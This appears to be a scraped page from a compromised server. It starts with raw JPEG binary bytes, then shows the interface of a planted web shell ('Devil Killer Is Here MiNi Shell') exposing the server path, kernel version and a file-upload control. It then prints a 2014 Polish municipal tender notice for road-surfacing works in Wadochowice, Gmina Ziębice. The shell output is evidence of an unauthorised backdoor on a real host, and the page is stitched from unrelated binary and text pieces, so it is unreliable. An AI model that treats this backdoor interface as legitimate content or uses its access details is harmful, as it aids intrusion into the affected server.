JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140611/198350-N-2014.html

<p class="kh_header"><b>Ziębice: UTWARDZENIE TERENU NA CZĘŚCI DZIAŁKI NR 333 NA POTRZEBY KOMUNIKACYJNE W MIEJSCOWOŚCI WADOCHOWICE</b><br>
<b>Numer ogłoszenia: 198350 - 2014; data zamieszczenia: 11.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ziębice , ul. Przemysłowa 10, 57-220 Ziębice, woj. dolnośląskie, tel. 074 8163870, faks 074 8191212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ziebice.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTWARDZENIE TERENU NA CZĘŚCI DZIAŁKI NR 333 NA POTRZEBY KOMUNIKACYJNE W MIEJSCOWOŚCI WADOCHOWICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Opis przedmiotu zamówienia:

Przedmiotem zamówienia zgodnie z opisem i przedmiarem robót jest Utwardzenie terenu na części działki nr 333 na potrzeby komunikacyjne w miejscowości Wadochowice i obejmuje w szczególności:
- Wykonanie korytowania na całej szerokości jezdni i chodników - 866,5 m2	
- wykonanie drenażu rurowego z rur PCV perforowanych owiniętych geowłókniną - 67,0 m
- ustawienie krawężników oraz obrzeży chodnikowych - 273,5 m
- umocnienie skarp płytami ażurowymi - 51,6 m2
- wykonanie warstwy odsączającej o gr. 10 cm - 866,5 m2
- wykonanie podbudowy tłuczniowej warstwa dolna gr. 20cm, warstwa górna gr. 10cm- 866,5 m2
- wykonanie nawierzchni z mieszanek mineralno - bitumicznych asfaltowych  - 478,0 m2 
- wykonanie nawierzchni z płyt ażurowych - 388,5 m2  
- wykonanie przepustu rurowego pod zjazdami o średnicy 40 cm - 5,0 m	oraz ścieków
    z elementów betonowych gr. 15 cm - 4,0 m

Szczegółowy opis przedmiotu zamówienia zawarty jest w: 
1)	przedmiarze robót - załącznik nr 10
2)	projekcie budowlano-wykonawczym - załącznik nr 11
3)	specyfikacji technicznej wykonania i odbioru robót budowlanych  STWiORB - załącznik nr 12
Wykonawca zrealizuje roboty będące przedmiotem umowy z materiałów własnych (zakupionych przez siebie) oraz z materiałów zakupionych przez inwestora. 


Wykaz materiałów będących własnością Zamawiającego, które zostaną przekazane Wykonawcy do wbudowania:

1. Płyty ażurowe MEBA  o wym. 60 x 40 x 10 cm - szt. 1824
2.Korytka drogowe ściekowe o wym. 50 x 50 x 15 cm	- szt. 8
3. Krawężniki drogowe o wym. 100 x 30 x 15 cm	 - szt. 150
4. Obrzeża betonowe o wym. 100 x 30 x 8 cm - szt. 132
5. Mieszanka 0-63 mm do podbudowy - t 299,60

Cena ofertowa nie może zawierać wyceny materiałów, które Zamawiający przekaże Wykonawcy.
Materiał wymieniony:
w poz. 1-4 zlokalizowany jest w odległości - 200 m od miejsca                                      wbudowania.
w poz. 5 zlokalizowany jest w odległości 1 km od miejsca wbudowania
Wykonawca we własnym zakresie ma dowieźć materiał na miejsce budowy.
 
Ewentualne podane w opisach nazwy własne nie mają na celu naruszenie art. 29 i 7 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity z dnia 09.08.2013 roku Dz. U. z 2013 r. poz. 907 z późn. zm. zwana dalej Pzp ), a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu technologicznego, wydajnościowego i funkcjonalnego założonego w projekcie. Przyjęcie rozwiązań równoważnych powodujące konieczność ingerencji w dokumentację projektową i wydane decyzje administracyjne wymagają ewentualnej zgody autora projektu w zakresie ochrony praw autorskich. Koszty związane z koniecznością zmian w projekcie i wydanych decyzjach administracyjnych leżą po stronie Wykonawcy. Termin wykonania całości przedmiotu zamówienia musi uwzględniać czas niezbędny na wykonanie ewentualnych zmian

Za datę zakończenia robót przyjmuje się datę pisemnego zgłoszenia przez Wykonawcę przedmiotu umowy o zakończeniu robót i gotowości do odbioru.
Wykonawca udzieli gwarancji na wykonane przez siebie prace na okres 36 miesięcy.

Przygotowując ofertę wykonawcy mają obowiązek zapoznać się z terenem budowy..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY PRZEWIDUJE UDZIELENIE ZAMÓWIEŃ UZUPEŁNIAJĄCYCH Zamówienia uzupełniające zostaną udzielone na podstawie odrębnej umowy w trybie zamówienia z wolnej ręki na podstawie art. 67 ust 1 pkt 6 ustawy pzp. zamówienia uzupełniające mogą zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9, 45.23.24.51-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  
- co najmniej dwie roboty budowlane polegające na budowie, przebudowie lub remoncie drogi o nawierzchni z mieszanek mineralno -bitumicznych asfaltowych lub/i elementów betonowych, o wartości nie mniejszej niż 50.000,00 złotych brutto dla każdej roboty budowlanej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca 

- wykaże, iż dysponuje, co najmniej jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności drogowej, które uprawniają do pełnienia funkcji kierownika budowy, odpowiadającym przedmiotowi zamówienia, 

- złoży oświadczenie, że kierownik budowy, który będzie uczestniczył w wykonaniu zamówienia posiada wymagane uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami budowlanymi w specjalności drogowej, które uprawniają do pełnienia funkcji kierownika budowy, oraz posiada aktualny wpis na listę członków właściwej izby.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 50.000,00 PLN
W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia przy ocenie spełniania warunku udziału w postępowaniu potencjał ekonomiczny i finansowy będzie podlegał sumowaniu
W przypadku wykonawców którzy wykażą posiadanie środków finansowych lub zdolności kredytowej w innych walutach niż złoty polski zamawiający przeliczy podane kwoty po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający określa, że robotami budowlanymi, których  dotyczy obowiązek wykazania przez wykonawcę w wykazie i złożenie dla nich poświadczeń, dotyczy co najmniej:
- dwie roboty budowlane polegające na budowie, przebudowie lub remoncie drogi o nawierzchni z mieszanek mineralno -bitumicznych asfaltowych lub/i elementów betonowych, o wartości nie mniejszej niż 50.000,00 złotych brutto dla każdej roboty budowlanej.
Zamawiający nie wymaga informacji o robotach budowlanych niewykonanych lub  wykonanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)     Uproszczony kosztorys ofertowy 
2) Pełnomocnictwo w oryginale bądź kopii potwierdzonej notarialnie                                   do reprezentowania, o ile ofertę składa pełnomocnik,
3)	   Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi                do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Pisemne zobowiązanie innych podmiotów należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem na załączniku nr 8 do SIWZ  
a)	 Jeżeli wykonawca, polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia  innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, zamawiający, w celu oceny, czy wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów przedstawia również dokument zawierający:
-	jaki jest  zakres dostępnych wykonawcy zasobów innego podmiotu, 
-	jaki jest sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy  wykonywaniu zamówienia,
-	jaki jest charakter stosunku, jaki będzie łączył wykonawcę z innym podmiotem, 
-	jaki jest zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku          do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:
1)	zmiana terminu realizacji przedmiotu umowy,
a)	zmiany spowodowane warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót, w szczególności długotrwałe opady deszczu/śniegu, roztopy, nawodnienie gruntu
b)	zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi a w szczególności:
-	niewybuchy i niewypały,
-	wykopaliska archeologiczne nie przewidziane w SIWZ,
-	odmienne od przyjętych w dokumentacji projektowej warunki terenowe                        w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
c)	zmiany będące następstwem okoliczności leżących po stronie  Zamawiającego                         a w szczególności:
-	wstrzymanie robót przez Zamawiającego
-	konieczność  usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,
-	konieczność udzielenia zamówień uzupełniających, dodatkowych
d)	zmiany będące następstwem działania organów administracji, w szczególności:
-	wstrzymanie prac przez organ konserwatorski,
-	przekroczenie terminów wydanych decyzji, zezwoleń, itp.,
-	odmowa wydania przez organy administracji wymaganych uzgodnień na skutek błędów w dokumentacji projektowej,

w przypadku wystąpienia  którejkolwiek z okoliczności wymienionych w literach a-d termin umowy może ulec zmianie o czas niezbędny do zakończenia wykonania jej przedmiotu  w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
2)	zmiana sposobu spełnienia świadczenia:
a)	zmiany technologiczne a w szczególności:
-	konieczność zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem umowy.
-	odmienne od przyjętych w dokumentacji  projektowej warunki skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych, 
-	odmienne od przyjętych w dokumentacji projektowej warunki terenowe,                        w szczególności istnienie podziemnych urządzeń, instalacji  lub obiektów infrastruktury,
-	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.

Zmiany o których mowa w ppkt 2 lit a tiret 2 i 3 mogą być wprowadzone w sytuacjach, odpowiadających przesłankom  do udzielenia zamówień dodatkowych, oraz w innych sytuacjach, zmiany wskazywane w ppkt. 2 lit a  tiret 4 będą wprowadzone wyłącznie  w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia  wynagrodzenia z tytułu  takich zmian wyłącznie                    w kwocie równej  zwiększonym z tego powodu kosztom.
Każda ze wskazanych zmian w ppkt 2 lit .a tiret 1-4 może być powiązana z obniżeniem lub wynagrodzenia na zasadach określonych przez strony.
3)	Zmiana obowiązującej stawki VAT:
a)	jeżeli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT  zapłaconego przez Wykonawcę 
b)	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę podatku VAT do zapłacenia przez Wykonawcę.
4)	Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy.  W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie  pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
5)	Jeżeli inny podmiot rozpocznie inwestycję na terenie objętym przedmiotem zamówienia i wystąpią jakiekolwiek kolizje, w takim przypadku zmiany w  umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji.
6)	Zmiany w zakresie podwykonawcy na którego zasoby powoływał się Wykonawca na zasadach określonych w art. 26 ust 2b ustawy Pzp. 
a)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
7)	Zmiana podwykonawcy w przypadkach innych niż określone w ppkt 6
a)	zmiana polegająca na wskazaniu innych podwykonawców
b)	zmiana w zakresie rezygnacji  z podwykonawców 
c)	zmiana polegająca na wskazaniu innego zakresu (części) podwykonawstwa
d)	zmiana polegająca na wykonaniu zamówienia przy pomocy podwykonawców pomimo niewskazania w ofercie żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa 
8)	zmianę osób odpowiedzialnych za 
a)	kierowanie robotami budowlanymi ze strony wykonawcy (kierownik budowy) zgodnie z warunkami zawartymi w SIWZ, tj. kierownik budowy będzie posiadał uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, które uprawniają do pełnienia funkcji kierownika budowy, odpowiadającym przedmiotowi zamówienia, Wykonawca zobowiązuje się do przedłożenia, w dniu podpisania aneksu do umowy, dokumentu potwierdzającego kwalifikacje kierownika budowy oraz aktualny wpis na listę właściwej Izby Samorządu Zawodowego lub dokumenty, które potwierdzają odpowiednie kwalifikacje i zostały uznane na zasadach określonych w przepisach odrębnych (podstawa prawna art. 12a ustawy Prawo budowlane)
b)	nadzór inwestorski ze strony zamawiającego (inspektora nadzoru inwestorskiego)
